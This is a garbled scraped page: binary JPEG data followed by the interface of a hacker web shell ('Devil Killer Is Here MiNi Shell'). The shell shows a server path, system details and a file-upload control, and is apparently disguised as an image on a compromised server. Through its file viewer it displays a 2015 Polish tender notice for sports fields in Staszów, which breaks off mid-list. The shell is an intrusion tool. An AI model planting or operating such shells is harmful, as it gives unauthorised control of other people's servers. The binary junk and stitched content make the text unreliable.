JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150122/9647-N-2015.html

<p class="kh_header"><b>Staszów: Budowa ogólnodostępnych boisk sportowych i zaplecza rekreacyjnego na obszarach wiejskich
Gminy Staszów</b><br>
<b>Numer ogłoszenia: 9647 - 2015; data zamieszczenia: 22.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Staszów , ul. Opatowska 31, 28-200 Staszów, woj. świętokrzyskie, tel. 015 8642014, faks 015 8643261.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ogólnodostępnych boisk sportowych i zaplecza rekreacyjnego na obszarach wiejskich
Gminy Staszów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa ogólnodostępnych boisk sportowych i zaplecza rekreacyjnego
na obszarach wiejskich Gminy Staszów. Zakres zamówienia obejmuje:
1) Zadanie nr 1 pn: Budowa boisk i zagospodarowanie terenu wokół boisk w Oględowie.
Przedmiotem zamówienia jest budowa ogólnodostępnych boisk sportowych na działce ozn. w ewid.
gruntów nr 390 położonej w miejscowości Oględów w zakresie:
-budowy boiska sportowego wraz z wyposażeniem do piłki nożnej o wymiarach 29,0 m x 44,0 m o
nawierzchni trawiastej;
-budowy boiska sportowego wraz z wyposażeniem do piłki siatkowej o wymiarach 9,50 m x 18,0m o
nawierzchni trawiastej;
-wykonania piłkochwytów dł. 82,0 m, w tym: 58,0m wys. 6,0m (za bramkami), 24,0m wys. 4,0m (boczne);
-zagospodarowania terenu obejmującego m. in. elementy małej architektury tj. ławki, kosze na śmieci;
2) Zadanie nr 2 pn: Budowa ogólnodostępnego boiska sportowego i zaplecza rekreacyjnego w Jasieniu.
Przedmiotem zamówienia jest budowa ogólnodostępnego boiska oraz placu zabaw na działce ozn. w ewid.
gruntów nr: 379, położonej w miejscowości Jasień w zakresie:
-budowy boiska sportowego wraz z wyposażeniem do piłki nożnej o wymiarach 23,0 m x 43,0 m o
nawierzchni trawiastej;
-wykonania placu zabaw dla dzieci z nawierzchnią trawiastą, obejmującego urządzenia:
-zestaw zabawowy dwuwieżowy ze zjeżdżalnią - 1 szt,
-huśtawka wagowa podwójna (ważka) - 1 szt,
-huśtawka wahadłowa - 1szt,
-bujak na sprężynach (kiwak) -2 szt,
-urządzenie linarne - 1 szt,
-tablica informacyjna z regulaminem placu zabaw - 1 szt,
-kosz na śmieci - 2 szt ,
-ławki z oparciem - 4 szt,
-ogrodzenie z paneli zgrzewanych (dł. ogrodzenia ok. 60 mb w tym 1 furtka),
-zagospodarowania terenu obejmującego m. in. tereny zielone, ławki bez oparcia- 6 szt., kosze na śmieci -
2 szt., stojaki rowerowe;
zgodnie z dokumentami (w załączeniu do opisu przedmiotu zamówienia) oraz inne konieczne prace
gwarantujące prawidłowe wykonanie przedmiotu zamówienia.
Ponadto odrębnie dla każdego zadania należy:
-zapewnić obsługę geodezyjną, w tym wykonać inwentaryzację powykonawczą,
-umieścić tablicę informacyjną o źródłach finansowania zadania ze środków Unii Europejskiej.
Zamówienie objęte pomocą w ramach działania 413 Wdrażanie lokalnych strategii rozwoju dla operacji,
które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i Rozwój wsi objętego PROW
na lata 2007-2013.
Opis przedmiotu zamówienia wraz z dokumentami, stanowi załącznik Nr 9 SIWZ.
Wykonawca udzieli gwarancji i rękojmi na roboty objęte przedmiotowym zamówieniem na okres minimum
36 miesięcy od daty ich odbioru końcowego.
Przedmiotowe zamówienie musi być wykonane zgodnie z obowiązującymi przepisami oraz warunkami
zawartymi w SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości
zmówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, zgodnie z
zapisami art. 67 ust.1 pkt.6 Pzp</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.00-8, 45.11.12.00-0, 45.11.27.23-9, 45.34.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium dla poszczególnych zadań w wysokości:
Zadanie Nr 1 - 1 500,00zł (słownie złotych: jeden tysiąc pięćset 00/100),
Zadanie Nr 2 - 2 500,00 zł (słownie złotych: dwa tysiące pięćset 00/100),
w formach i w terminie określonych w SIWZ, zgodnie z ustawą Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału
w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy, wg
formuły spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego posiadania wiedzy i doświadczenia zamawiający wymaga
wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej i prawidłowo
ukończonej:
-
 dot. zadania Nr 1 - co najmniej 1 roboty budowlanej, obejmującej m.in. wykonanie boiska sportowego o
wartości brutto tych robót nie mniejszej niż 50 000,00zł.;
-
 dot. zadania Nr 2 - co najmniej 1 roboty budowlanej, obejmującej m.in. budowę boiska sportowego oraz
wykonanie placu zabaw o łącznej wartości brutto tych robót nie mniejszej niż 100 000,00zł.; Dopuszcza się
realizację powyższych robót w dwóch odrębnych zadaniach, gdzie jedno dotyczyło m.in. budowy boiska
boiska sportowego o wartości brutto tych robót nie mniejszej niż 50 000,00zł. drugie dotyczyło m.in.
wykonania placu zabaw o wartości brutto tych robót nie mniejszej niż 50 000,00zł.
Na potwierdzenie spełniania niniejszego warunku wykonawcy złożą określone w ogłoszeniu i SIWZ
oświadczenia lub dokumenty. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą
wykazać, że łącznie spełniają ww. warunek.
Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń lub dokumentów,
uwzględniając zapisy art. 26 ust. 3 ustawy, wg formuły spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w zakresie dysponowania potencjałem technicznym.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału
w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy, wg
formuły spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego osób zdolnych do wykonania zamówienia zamawiający wymaga
dysponowania osobą (kierownik budowy) posiadającą uprawnienia budowlane bez ograniczeń do
kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej;
W zakresie określonych uprawnień budowlanych dopuszcza się odpowiadające im:
- ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących
przepisów;
- kwalifikacje zawodowe uprawniające do wykonywania samodzielnych funkcji technicznych w
budownictwie wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji
Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu EFTA- stron
umowy o Europejskim Obszarze Gospodarczym, z zastrzeżeniem art. 12 a i innych przepisów ustawy
Prawo Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach
członkowskich Unii Europejskiej (Dz. U z 2008 r., Nr 63, poz. 394)
Na potwierdzenie spełniania niniejszego warunku wykonawcy złożą określone w ogłoszeniu i SIWZ
oświadczenia lub dokumenty. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą
wykazać, że łącznie spełniają ww. warunek.
Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń lub dokumentów,
uwzględniając zapisy art. 26 ust. 3 ustawy, wg formuły spełnia lub nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w zakresie sytuacji ekonomicznej i finansowej.
Zamawiający dokona oceny spełniania warunku na podstawie oświadczenia o spełnianiu warunków udziału
w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, uwzględniając zapisy art. 26 ust. 3 ustawy, wg
formuły spełnia lub nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Wypełniony formularz oferty, odrębnie dla każdego zadania
- Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy polega na
wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia,
zdolnościach finansowych lub ekonomicznych innych podmiotów, na zasadach określonych w art. 26 ust.
2b ustawy zobowiązany jest udowodnić, że będzie dysponował tymi zasobami w trakcie realizacji
zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do
oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
- Jeżeli wykonawca zastrzegł, że informacje zawarte w ofercie, nie mogą być udostępniane zobowiązany jest
wykazać, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy
z dnia 16 kwietnia 1993 roku o zwalczaniu nieuczciwej konkurencji.
- Pełnomocnictwo, określające jego zakres w przypadku, gdy Wykonawcę reprezentuje pełnomocnik.
- Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo
reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców
występujących wspólnie (w tym: konsorcja, spółki cywilne) w przypadku wspólnego ubiegania się o
udzielenie niniejszego zamówienia,
dokumenty / Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
- Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
- W przypadku składania oferty przez wykonawców występujących wspólnie, wykonawcy ustanowią
pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w
postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
- Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się
o udzielenie zamówienia.
- Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia została wybrana
zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy
regulującej współpracę tych wykonawców.
- Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie
zabezpieczenia należytego wykonania umowy.
- Każdy oddzielnie z Wykonawców występujących wspólnie nie może podlegać wykluczeniu
z postępowania na podstawie art. 24 ust.1 i 2 Pzp;
- Wykonawcy występujący wspólnie muszą łącznie spełniać warunki, o których mowa w art. 22 ust.1 ustawy
- W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
- dokumenty wskazane w pkt III.4, pkt III.5 oraz pkt.III.6 niniejszego ogłoszenia i w SIWZ (jeżeli dotyczy) -
każdy z Wykonawców musi złożyć oddzielnie,
- dokumenty wskazane w pkt III.6 niniejszego ogłoszenia i w SIWZ (jeżeli dotyczy) oraz oświadczenie o
spełnianiu warunków udziału w postępowaniu - Wykonawcy składają łącznie.
Dokumenty dotyczące podmiotów zagranicznych
1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1) niniejszego ogłoszenia,
zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do
reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem
samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w
którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Przepis dot.
wystawienia dokumentu o którym mowa w pkt III.4.3.1) niniejszego ogłoszenia stosuje się odpowiednio.
2. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub
miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do
właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma
siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących
przedłożonego dokumentu</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja i rękojmia na przedmiot umowy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany umowy mogą być dokonywane jedynie w sposób zgodny z przepisami Ustawy Prawo Zamówień
Publicznych (art. 144) i mogą być wprowadzane w przypadku:
1) konieczności dokonania zmian projektowych, które są niezbędne dla prawidłowego wykonania
przedmiotu umowy, wprowadzanych w trybie nadzoru autorskiego przeprowadzonego zgodnie z
przepisami Prawa Budowlanego lub usuwania błędów w tej dokumentacji;
2) ponadto Zamawiający przewiduje możliwość wprowadzania zmian w przypadku wystąpienia co
najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich
wprowadzenia:
a) Zmiana terminu wykonania umowy:
i.Zmiany spowodowane warunkami atmosferycznymi, w szczególności:
-klęski żywiołowe;
-warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób
i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 00C, wiatr
uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury),
gradobicie, burze z wyładowaniami atmosferycznymi,
- niewypały i niewybuchy,
-wykopaliska archeologiczne,
-odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego warunki
geologiczne ( kategorie gruntu, kurzawka, głazy narzutowe itp.),
- odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego warunki terenowe,
w szczególności istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych
obiektów budowlanych (bunkry, fundamenty, ściany szczelne itp.),
ii.Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:
- nieterminowe przekazanie terenu budowy przez Zamawiającego;
- wstrzymanie robót przez Zamawiającego;
- wykonanie przez Zamawiającego robót budowlanych lub dostaw bez realizacji których
Wykonawca nie może w sposób należyty wykonywać przedmiotu umowy, z przekroczeniem
terminów wskazanych dla wykonania tych robót lub dostaw;
- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji umowy, w
szczególności w projekcie budowlanym i przedmiarach robót;
iii.Zmiany będące następstwem działania organów administracji, w szczególności:
- odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na
skutek błędów w dokumentacji dostarczonej przez Zamawiającego;
iv.Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące
niemożliwością prowadzenia prac w szczególności:
- brak możliwości dojazdu oraz transportu materiałów na teren budowy spowodowany awariami,
remontami lub przebudowami dróg dojazdowych;
- protesty mieszkańców;
- przerwa w dostawie energii elektrycznej, wody, gazu;
v.Zmiany terminu wykonania przedmiotu umowy w przypadku konieczności wykonania
zamówienia dodatkowego lub uzupełniającego.
vi.Zamawiający dopuszcza możliwość przedłużenia terminu wykonania umowy, mimo, iż
opóźnienie w wykonaniu umowy będzie następstwem okoliczności, za które odpowiada
Wykonawca, jeżeli:
- Wykonawca powiadomi Zamawiającego najpóźniej na 20 dni przed upływem terminu
wykonania umowy o niemożliwości ukończenia robót w tej dacie;
- Wykonawca zaproponuje nowy termin wykonania umowy;
- Wykonawca zaproponuje Zamawiającemu zrekompensowanie powstałego opóźnienia, w tym
przez przedłużenie okresu gwarancji. W takim przypadku wartość umowy może zostać
obniżona o kwotę nie mniejszą niż równowartość połowy kar umownych, które Wykonawca
byłby zobowiązany zapłacić Zamawiającemu za takie opóźnienie, lecz niższą niż kwota tych
kar.
vii. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. od i. do iv. termin
wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do wykonania
przedmiotu umowy w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
b) Zmiana sposobu spełnienia świadczenia umowy:
i. Zmiany technologiczne, w szczególności:
- niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji umowy, w
szczególności w projekcie budowlanym, a spowodowana zaprzestaniem produkcji lub
wycofaniem z rynku tych materiałów lub urządzeń;
- pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na
zaoszczędzenie kosztów realizacji przedmiotu Umowy lub kosztów eksploatacji wykonanego
przedmiotu umowy;
- pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na
zaoszczędzenie czasu realizacji umowy lub kosztów wykonywanych robót, jak również
kosztów eksploatacji wykonanego przedmiotu umowy,
- konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych/
technologicznych lub materiałowych niż wskazane w dokumentach umowy, w szczególności
w projekcie budowlanym w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło
niewykonaniem lub wadliwym wykonaniem umowy,
- konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych lub
materiałowych ze względu na zmiany obowiązującego prawa,
